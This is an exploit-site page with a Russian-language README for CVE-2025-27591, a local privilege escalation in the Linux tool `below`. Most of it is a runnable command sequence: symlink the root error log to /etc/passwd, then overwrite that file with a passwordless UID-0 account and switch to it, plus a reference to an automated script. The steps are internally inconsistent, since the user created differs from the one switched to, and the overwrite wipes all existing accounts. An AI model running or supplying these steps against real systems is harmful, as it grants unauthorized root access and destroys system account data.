Sploitus

Exploit for Linux-Privilege-Escalation

kitploit · 2026-09-04

Exploit Code

MARKDOWN125 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DOLLARBOYSUSHIL-LINUX-PRIVILEGE-ESCALATION-CVE-2025-27591
# CVE-2025-27591 - Повышение привилегий через доступный для записи симлинк в `below`

## Сводка

Это простой эксплойт для **CVE-2025-27591** — уязвимости локального повышения привилегий в инструменте мониторинга Linux `below`. Уязвимость затрагивает версии до v0.9.0 и связана с некорректными назначениями прав доступа в системе. Проблема была обнаружена в январе 2025 года и публично раскрыта 12 марта 2025 года (SecurityOnline, OpenWall). При запуске `below` с `sudo` ошибки могут записываться в общедоступный для записи каталог (`/var/log/below`), что позволяет злоумышленникам создавать симлинк на чувствительные цели, такие как `/etc/passwd`.

Используя это, непривилегированный пользователь с доступом к `below` через `sudo` может повысить привилегии до root.

* * *

## Детали уязвимости

  * **CVE ID** : CVE-2025-27591
  * **Уязвимый инструмент** : `below`
  * **Затрагиваемая функция** : запись журнала через `below record`
  * **Уязвимый путь** : `/var/log/below/error_root.log`
  * **Предварительные условия атаки** : 
    * Каталог `/var/log/below` доступен для записи всем пользователям
    * Злоумышленник может запускать `sudo /usr/bin/below record` без пароля



* * *

# Шаги эксплуатации (вручную)

✅ Шаг 1: Проверьте, что каталог журнала доступен для записи всем Вы должны увидеть:

root@kitploit:~
    
    
    drwxrwxrwx 2 root root 4096 ... /var/log/below
    

![alt text](https://assets.kitploit.com/production/public/readmes/24820/254cb12d931565ed486e3ae7fd1494a224b76dbb473aa6fdad695e4ac2f262b2.png)

✅ Шаг 2: Удалите существующий `error_root.log`

root@kitploit:~
    
    
    rm -f /var/log/below/error_root.log
    

✅ Шаг 3: Создайте симлинк на /etc/passwd

root@kitploit:~
    
    
    ln -s /etc/passwd /var/log/below/error_root.log
    

затем проверьте с помощью

root@kitploit:~
    
    
    ls -la /var/log/below/error_root.log
    # should show: error_root.log -> /etc/passwd
    

![alt text](https://assets.kitploit.com/production/public/readmes/24820/51881b73c4636ba45e40d43e8cc5672b9feb4af9e34939f83bbd4372ad9ad46d.png)

✅ Шаг 4: Создайте файл полезной нагрузки Это добавит нового root-пользователя attacker без пароля:

root@kitploit:~
    
    
    echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
    

структура файла

root@kitploit:~
    
    
    username:password:UID:GID:comment(home/full name):home_directory:shell
    

ключевой момент здесь — UID и GUID мы устанавливаем UID и GUID в 0, что делает пользователя root-пользователем, а Group ID = root-группа

![alt text](https://assets.kitploit.com/production/public/readmes/24820/22ed4a5495bad8d08278add7dcb1820b2aa88c4a47b33e0c4b03177b131cbb8a.png)

✅ Шаг 5: Вызовите запись журнала от имени root Это ядро эксплойта.

root@kitploit:~
    
    
    sudo /usr/bin/below record
    

Эта команда, как ожидается, завершится ошибкой или по тайм-ауту — но она попытается записать журнал ошибок в /var/log/below/error_root.log, который на самом деле является /etc/passwd. 💡 В некоторых случаях этого может быть достаточно для повреждения /etc/passwd — поэтому далее мы полностью перезаписываем его.

✅ Шаг 6: Перезапишите /etc/passwd через симлинк

root@kitploit:~
    
    
    cp /tmp/payload /var/log/below/error_root.log
    

![alt text](https://assets.kitploit.com/production/public/readmes/24820/657ebf900e2a27ae7c66126c4b6cd3bbe7e56d6d000c1cc283faeb6a8417cacd.png)

✅ Шаг 7: Станьте root

root@kitploit:~
    
    
    su attacker
    

Вы попадёте в root-оболочку, пароль не нужен.

![alt text](https://assets.kitploit.com/production/public/readmes/24820/d23efc36397b41f59857c7f6d85d8e064e26f7e90ccd906dc615e29af68d6122.png)

# Шаги эксплуатации (автоматически)

root@kitploit:~
    
    
    python3 dbs_exploit.py
    

![alt text](https://assets.kitploit.com/production/public/readmes/24820/bde70a01f2dd3e131218bd5b95a2ecd6055bb556c1a145477bb38b1cd74619cf.png)